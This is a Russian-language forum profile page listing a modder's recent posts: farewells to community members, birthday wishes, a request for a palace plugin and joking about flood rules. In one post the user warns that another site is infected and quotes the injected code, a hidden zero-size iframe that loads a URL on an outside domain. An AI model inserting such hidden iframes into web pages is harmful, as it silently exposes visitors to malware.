Перейти к содержанию

Олег Барс

Граждане
  • Постов

    325
  • Зарегистрирован

  • Посещение

Информация о Олег Барс

  • День рождения 05/22/1980

Информация

  • Город
    Россия
  • Пол
    Мужчина

Контакты

  • Сайт
    http://

Достижения Олег Барс

Воин

Воин (5/14)

  1. Иннельда, поздравляю! Много говорить не буду, хех, да и не смогу... Старый солдат не знает слов любви... Но, очень тебя люблю и уважаю. Всего, всего, всего, и т.д. Всего самого самго!!! С уважением, Олег.
  2. Спасибо всем! Алекс, удачи. Ёжик, ты лучший модостроитель! Творческих успехов тебе! Виталик, Варг, Боблен, Дима, просто удачи! Рад что с вами познакомился. Было интенресно. Вообще Фуллрест это был определенный шаг в моей жизни. Я с большим теплом вспоминаю тех кто встретился мне здесь. Фалькон, с которым мы зарегестрировались почти в один день. Флудер, в хорошем смысле слова, сейчас таких нет. Каждое его сообщение было осмысленным, его интересно было читать и говорить с ним. Да, сейчас таких мастеров уже нет. Ксар, бывший главный тестер, когда я только пришел на сайт. и которого я сменил на посту, хороший человек. Во многом я его не понимал, ни тогда, ни позже. Но это личность и я всегда его уважал. Strnger2(потом без 2), незнаю тут ты еще или нет, тебе спсибо за вопросы, многому, благодяря тебе научился. Менорра, Ведьма, переводчицы, Иннельда, хозяйка академии, Влад, который подхватил упавшее знамя тестеров. И другие, извините кого не назвал. Всем Фуллрестовцам желаю самого лучшего! С уважением, Олег.
  3. Это типа редактора и плейера текстовых квестов в космических рейнджерах? Прикольно, посмотрю.
  4. Мои поздравления, товарищ!
  5. Ищу плагин большого замка. Дворец, просторный внутренний двор или дворцовая площадь. Здания разные: церковь, биюлиотека, музей, парк и т.п. Что-то вроде загородной резиденции императора. Лучше в имперском или нордском стиле. Можно в составе города. Интерьер не обязателен, нужен именно экстерьер дворцового комплекса. Желательно (но не обязательно), без дополнительной графики и под английскую версию.
  6. Ненене демон, я эти правила писал и когда был админом не мог их нарушить, не красиво бы было. А щас я простой юзер. Только флудить я не умею. Если только с кем-то из модеров поспорить, поругаться, это умею)))
  7. Срочно нафлудите на одну))) Будет кавайно -- админ Фуллреста нарушает его правила)))
  8. Ога, точно! Юзеры же еще и плюшки имеют право получать)))
  9. и плюшки получать?)))
  10. А это чтобы можно было флудить, офтопить и флеймить, в общем, все радости доступные простым пользователям:)
  11. а хде красные буквы?О____О
  12. Там на сайте обычный вирус, пишет в текст страницы (два раза) невидимый фрейм: <iframe name=PS_Al src='http://71soldo.info/t/?PS_Al=ТУТ_СЛУЧАЙНОЕ_ЧИСЛО width=0% height=0% scrolling=no frameborder=0 marginheight=0 marginwidth=0></iframe> Что там дальше не смотрел. Это админам тамошним надо сказать, поправят. На сами архивы это не влияет. А вообще, выбросьте ИЕ и пользуйтесь нормальными браузерами.
×
×
  • Создать...